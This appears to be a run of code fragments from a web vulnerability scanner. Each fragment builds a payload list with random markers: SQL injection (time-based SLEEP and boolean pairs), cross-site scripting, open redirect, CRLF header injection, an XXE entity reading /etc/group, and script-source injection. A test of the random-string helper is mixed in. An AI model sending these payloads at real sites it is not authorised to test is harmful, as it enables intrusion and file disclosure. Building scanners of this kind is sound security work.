def __init__(self):
"""Define static payloads"""
self._payloads = [
"'", '"', '(', ')', "NULL",
utility.generate_random(string.ascii_lowercase, size=5),
utility.generate_random(string.digits, size=4), "--"
]
def __init__(self):
"""Define static payloads"""
payloads = [
# single quotes
("' UNION SELECT SLEEP(9) -- ", 9.00),
("' UNION SELECT null,SLEEP(9) -- ", 9.00),
("' UNION SELECT null,null,SLEEP(9) -- ", 9.00),
("' UNION SELECT null,null,null,SLEEP(9) -- ", 9.00),
("' UNION SELECT null,null,null,null,SLEEP(9) -- ", 9.00),
# double quotes
('" UNION SELECT SLEEP(9) -- ', 9.00),
('" UNION SELECT null,SLEEP(9) -- ', 9.00),
('" UNION SELECT null,null,SLEEP(9) -- ', 9.00),
('" UNION SELECT null,null,null,SLEEP(9) -- ', 9.00),
('" UNION SELECT null,null,null,null,SLEEP(9) -- ', 9.00),
# integer
("1 UNION SELECT SLEEP(9) -- ", 9.00),
("1 UNION SELECT null,SLEEP(9) -- ", 9.00),
("1 UNION SELECT null,null,SLEEP(9) -- ", 9.00),
("1 UNION SELECT null,null,null,SLEEP(9) -- ", 9.00),
("1 UNION SELECT null,null,null,null,SLEEP(9) -- ", 9.00),
# operator
("' AND SLEEP(9) AND '{}'='{}", 9.00),
("' OR SLEEP(9) AND '{}'='{}", 9.00),
("') AND SLEEP(9) AND ('{}'='{}", 9.00),
("') OR SLEEP(9) AND ('{}'='{}", 9.00)
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase, size=4)
self._payloads = [(payload.format(self._random, self._random), delay)
for payload, delay in payloads]
def __init__(self):
"""Define static payloads"""
payloads = [
# AND
("' AND '{}'='{}", "' AND '{}'='!{}"),
("' AND '{}'='{}' -- ", "' AND '{}'='!{}' -- "),
("' AND '{}'='{}' #", "' AND '{}'='!{}' #"),
# OR
("' OR '{}'='{}", "' AND '{}'='!{}"),
("' OR '{}'='{}' -- ", "' AND '{}'='!{}' -- "),
("' OR '{}'='{}' #", "' AND '{}'='!{}' #"),
# like
("%' AND '%'='", "%' AND '%'='!"),
("%' OR '%'='", "%' AND '%'='!"),
# double quotes
('" OR "{}"="{}', '" AND "{}"="!{}'),
('" OR "{}"="{}" -- ', '" AND "{}"="!{}" -- '),
('" OR "{}"="{}" #', '" AND "{}"="!{}" #'),
# integer
("1 OR 1221=1221", "1 AND 1221=2112"),
# parentheses
("') AND ('{}'='{}", "') AND ('{}'='!{}"),
("') OR ('{}'='{}", "') AND ('{}'='!{}")
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase, size=4)
self._payloads = [(true.format(self._random, self._random),
false.format(self._random, self._random))
for true, false in payloads]
def __init__(self):
"""Define static payload"""
payloads = ["javascript:{}()"]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase, size=4)
self._payloads = [payload.format(self._random) for payload in payloads]
def __init__(self):
"""Define static payloads"""
payloads = [
# two tags
'<{}></{}>',
'"><{}></{}><"',
"'><{}></{}><'",
' ><{}></{}>< ',
# one tag
'<{} event=()>',
'"><{} event=()><"',
"'><{} event=()><'",
' ><{} event=()>< ',
# script tags
'</script><{}></{}><script>',
'</script><{} event=()><script>',
# special characters
'\\"><{}></{}><\\"',
'\\"><{} event=()><\\"'
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase)
self._payloads = [
payload.format(self._random, self._random) for payload in payloads
]
def __init__(self):
"""Define static payloads"""
payloads = [
'http://www.{}.com', 'https://www.{}.com', '//www.{}.com',
'/\t/www.{}.com', '/\\www.{}.com', 'https:www.{}.com'
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase)
self._payloads = [payload.format(self._random) for payload in payloads]
def test_generate_random():
# ascii letters
test = utility.generate_random(string.ascii_letters)
assert test.isalpha()
assert len(test) == 7
# digits
test = utility.generate_random(string.digits)
assert test.isdigit()
assert len(test) == 7
# custom size
test = utility.generate_random(string.ascii_letters, size=20)
assert test.isalpha()
assert len(test) == 20
# empty
test = utility.generate_random('')
assert test == ''
def __init__(self):
"""Define static payloads"""
payloads = [
'\r\nSet-Cookie: {}={}', '\nSet-Cookie: {}={}',
'\rSet-Cookie: {}={}', 'čĊSet-Cookie: {}={}'
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase)
self._payloads = [
payload.format(self._random, self._random) for payload in payloads
]
def __init__(self):
"""Define static payloads"""
payloads = [
'<?xml version="1.0"?><!DOCTYPE {} [<!ENTITY {} SYSTEM "file:///etc/group">]><{}>&{};</{}>'
]
# generate random
self._random = utility.generate_random(string.ascii_lowercase, size=4)
# add to payloads
root, entity = (self._random[::-1], self._random)
self._payloads = [payload.format(root, entity, root, entity, root) for payload in payloads]
def __init__(self):
"""Define static payload"""
payloads = [
# within src attribute
'//www.{}.com/{}.js',
'\\www.{}.com\\{}.js',
# add src attribute
'" src=//www.{}.com/{}.js><"',
'" src=\\www.{}.com\\{}.js><"',
"' src=//www.{}.com/{}.js><'",
"' src=\\www.{}.com\\{}.js><'",
" src=//www.{}.com/{}.js>< ",
" src=\\www.{}.com\\{}.js>< "
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase)
self._payloads = [payload.format(self._random, self._random[0]) for payload in payloads]
def __init__(self):
"""Define static payloads"""
payloads = [
# single quotes
"'+{}()+'",
"';{}();//'",
# double quotes
'"+{}()+"',
'";{}();//"',
# no quotes
'{}()',
# no parentheses
"'+{}``+'",
'"+{}``+"',
"';{}``;//'",
'";{}``;//"'
]
# generate random and add to payloads
self._random = utility.generate_random(string.ascii_lowercase, size=5)
self._payloads = [payload.format(self._random, self._random) for payload in payloads]